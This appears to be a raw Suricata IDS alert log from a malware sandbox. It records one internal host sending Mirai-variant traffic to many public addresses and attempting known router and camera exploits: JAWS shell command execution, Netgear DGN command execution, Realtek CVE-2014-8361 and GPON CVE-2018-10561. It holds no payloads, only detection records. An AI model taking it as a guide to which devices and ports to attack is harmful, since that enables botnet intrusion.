                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:57728 -> 65.131.166.130:49152
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:34024 -> 193.94.36.43:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37314 -> 47.69.248.12:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48676 -> 40.223.116.254:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41280 -> 215.50.246.23:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51378 -> 113.145.142.202:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52258 -> 45.27.188.99:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44964 -> 153.95.193.121:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34066 -> 16.29.234.244:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:34066 -> 16.29.234.244:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42974 -> 90.197.2.27:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52166 -> 157.149.9.22:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37392 -> 207.198.77.45:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47656 -> 30.227.89.81:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46134 -> 76.51.22.34:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50500 -> 215.47.78.226:7574
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:40804 -> 102.112.159.159:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:49554 -> 179.171.182.119:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:34192 -> 121.19.25.76:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33290 -> 214.156.186.64:5555
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:48258 -> 51.217.212.91:52869
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:57932 -> 101.125.216.151:52869
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:42974 -> 179.30.194.108:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41916 -> 126.179.23.111:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46876 -> 190.202.109.241:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54190 -> 131.214.104.215:7574
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:54226 -> 42.186.151.84:52869
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:44164 -> 131.95.252.218:52869
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:44314 -> 173.120.168.239:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45000 -> 3.254.159.181:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55572 -> 210.164.84.185:49152
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:39032 -> 61.2.36.48:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37956 -> 90.24.179.163:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:36522 -> 91.41.16.118:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51422 -> 177.60.56.110:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58674 -> 163.115.127.191:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53022 -> 117.238.33.98:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60702 -> 96.114.30.207:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39344 -> 205.19.156.154:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40054 -> 161.199.60.203:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59066 -> 67.156.164.38:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:54768 -> 171.2.151.108:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39970 -> 217.176.190.109:49152
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:37622 -> 74.94.9.126:52869
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:41712 -> 180.236.218.223:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33526 -> 81.109.6.200:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40896 -> 186.182.149.110:7574
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:47372 -> 162.33.207.205:52869
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:54874 -> 217.238.86.73:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59740 -> 56.225.44.220:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:39328 -> 213.56.209.193:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:51804 -> 193.245.80.68:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55656 -> 54.252.138.172:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:55656 -> 54.252.138.172:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:55636 -> 117.31.40.208:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49726 -> 73.24.73.232:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33286 -> 43.107.215.199:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42120 -> 92.244.233.206:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53112 -> 28.102.126.49:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:53112 -> 28.102.126.49:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51382 -> 113.213.140.110:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44534 -> 39.106.254.70:7574
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:51382 -> 113.213.140.110:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49316 -> 4.134.245.148:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35852 -> 3.179.237.117:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:51066 -> 73.124.161.55:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47610 -> 38.95.163.205:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37202 -> 216.199.223.139:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:47610 -> 38.95.163.205:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:37202 -> 216.199.223.139:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:38360 -> 140.124.226.188:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44018 -> 47.80.200.95:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56578 -> 65.143.55.175:49152
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:59574 -> 103.183.65.217:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:35372 -> 170.59.144.179:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50674 -> 150.55.156.79:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:40430 -> 214.6.88.200:49152
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:44416 -> 113.8.22.97:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58264 -> 131.241.38.205:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:58264 -> 131.241.38.205:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:52410 -> 8.202.67.229:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45200 -> 62.103.171.28:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:35852 -> 3.179.237.117:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:45200 -> 62.103.171.28:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:52678 -> 78.160.226.219:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47802 -> 15.233.37.150:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38868 -> 141.202.115.162:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:38328 -> 187.114.160.162:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60044 -> 93.98.197.179:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:35922 -> 194.17.56.146:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:35922 -> 194.17.56.146:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:40440 -> 21.244.144.86:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:60746 -> 36.77.84.33:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58704 -> 134.145.254.175:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:56796 -> 121.202.179.6:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59380 -> 212.148.153.192:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:56796 -> 121.202.179.6:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:54856 -> 167.151.164.41:7574
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:47786 -> 210.135.157.10:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46714 -> 12.69.195.226:7574
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:50674 -> 150.55.156.79:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51548 -> 182.98.49.24:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45250 -> 45.22.47.103:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50042 -> 137.151.78.143:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:50042 -> 137.151.78.143:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41714 -> 113.229.7.213:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:44986 -> 93.22.239.48:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:39006 -> 22.236.52.239:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:59510 -> 142.96.19.192:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:33314 -> 153.28.27.68:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:36960 -> 211.174.66.239:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:46238 -> 174.204.37.155:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:42320 -> 84.150.50.209:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:51398 -> 210.181.40.142:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:46306 -> 167.83.233.35:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:59632 -> 196.150.108.122:5555
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:39016 -> 123.244.144.208:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:45340 -> 110.161.89.185:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39032 -> 134.32.128.235:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43102 -> 73.249.134.188:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:37292 -> 149.210.29.201:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:36224 -> 124.74.74.114:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:54236 -> 136.34.183.2:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53188 -> 118.35.168.154:8080
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:56902 -> 194.213.146.39:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44166 -> 166.117.94.49:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:41214 -> 96.205.70.202:80
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:36822 -> 79.79.71.152:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:42466 -> 82.213.155.86:8080
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:47362 -> 93.52.53.0:8080
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:60748 -> 28.144.199.55:8080
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:42906 -> 84.2.80.57:52869
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:53766 -> 161.185.149.32:80
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:33840 -> 197.215.52.31:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50478 -> 49.122.11.82:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50158 -> 220.74.77.186:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:49998 -> 175.239.142.242:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58998 -> 222.31.51.54:49152
                            Source: Network trafficSuricata IDS: 2027339 - Severity 1 - ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound : 192.168.2.23:60892 -> 45.153.216.8:52869
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53736 -> 61.236.10.24:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:44828 -> 102.75.189.134:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:44828 -> 102.75.189.134:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:39344 -> 164.60.72.134:7574
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:53476 -> 71.213.59.190:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:50484 -> 91.32.136.60:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:60090 -> 54.126.187.157:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58394 -> 29.209.111.194:7574
                            Source: Network trafficSuricata IDS: 2029215 - Severity 1 - ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound : 192.168.2.23:47890 -> 57.137.146.124:80
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:58366 -> 167.177.237.132:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43678 -> 1.156.155.220:5555
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:43632 -> 11.152.97.248:49152
                            Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.23:48140 -> 158.155.184.153:80
                            Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.23:48140 -> 158.155.184.153:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:51548 -> 182.98.49.24:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:41912 -> 152.158.234.19:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:38632 -> 56.53.8.6:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:42154 -> 71.44.225.112:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:60422 -> 184.96.7.28:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:54880 -> 23.173.106.27:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:48676 -> 40.223.116.254:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:56424 -> 47.30.123.212:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:41714 -> 113.229.7.213:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:51378 -> 113.145.142.202:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:53384 -> 162.198.43.227:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:55264 -> 9.58.179.109:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:54774 -> 204.81.207.188:8080
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:54806 -> 143.186.21.173:80
                            Source: Network trafficSuricata IDS: 2027063 - Severity 1 - ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) : 192.168.2.23:39352 -> 222.38.112.228:80
